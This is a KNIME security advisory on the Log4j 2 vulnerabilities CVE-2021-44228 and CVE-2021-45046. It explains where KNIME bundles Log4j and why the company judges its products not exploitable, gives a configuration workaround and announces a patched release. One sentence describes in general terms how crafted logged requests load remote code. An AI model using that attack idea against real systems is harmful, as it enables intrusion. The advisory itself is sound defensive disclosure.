Several security vulnerability were identified in Apache Log4j 2, a library also present in current KNIME Analytics Platform installations (version 4.4 and 4.5). Details on the vulnerabilites are reported as CVE-2021-44228 and CVE-2021-45046 with more details and links on the Log4J security page.
Neither KNIME Server nor KNIME Analytics Platform are directly affected by these issues. KNIME Server application is not using Log4j. KNIME Analytics Platform uses an older version of Log4j (1.2.15) which is not affected by this issue. The only exception is a library used for processing PMML documents which does use Log4j 2 but is not susceptible to the published exploits. Read more details below.
In any case, we recommend adding the system property
-Dlog4j2.formatMsgNoLookups=true at the bottom of the knime.ini. This is one of the official workarounds and safely prevents exploitation of the vulnerability.
After careful review of the corresponding library, the reported vulnerability and the use within KNIME software, we came to the conclusion that the vulnerabilities can not be exploited in KNIME products.
Apache Log4j is a library to perform logging of application behavior. Though not used in the KNIME Server application (Tomcat), the library is distributed and used in versions 1 and 2 in KNIME Analytics Platform.
The above security problems are reported for version 2, which is present within KNIME Analytics Platform in a framework extension called Xmlbeans (org.apache.xmlbeans5_5.0.0.v202104291535/lib/log4j-core-2.14.0.jar). An exploit sends specially crafted requests to an affected service which includes them in log messages. This can then lead to loading and executing arbitrary code from remote locations. Since KNIME Analytics Platform is a local application, which does not listen for external requests, it is not susceptible to the issue.
When KNIME Analytics Platform is used as an executor for a KNIME Server, it is theoretically possible that an attacker invokes a workflow that processes provided data (e.g. a PMML model processed by the PMML Reader) through the XMLBeans library which then has to include parts of the sent file in a log message. However, this is rather difficult to construct (if at all, we did not find a way to do this on our own so far) and requires interaction of an authenticated user. Moreover the second vulnerability CVE-2021-45046 is only exploitable if the log format includes context-specific information. This is not the case for the logging configuration of KNIME Analytics Platform (see <runtime-workspace>/.metadata/knime/log4j3.xml).
An update of Log4j 2 to 2.17.1 will fix the issue and will be made available with the next regular bug fix release (KNIME Analytics Platform version 4.5.1 and 4.4.3).
KNIME Analytics Platform uses Log4J 1 for most of its logging. There are older security vulnerabilities reported against this version, CVE-2019-17571 and CVE-2020-9488, but none of them affect KNIME Analytics Platform because the affected parts (remote logging through SocketServer, JMS or SMTP Appender) are not in use.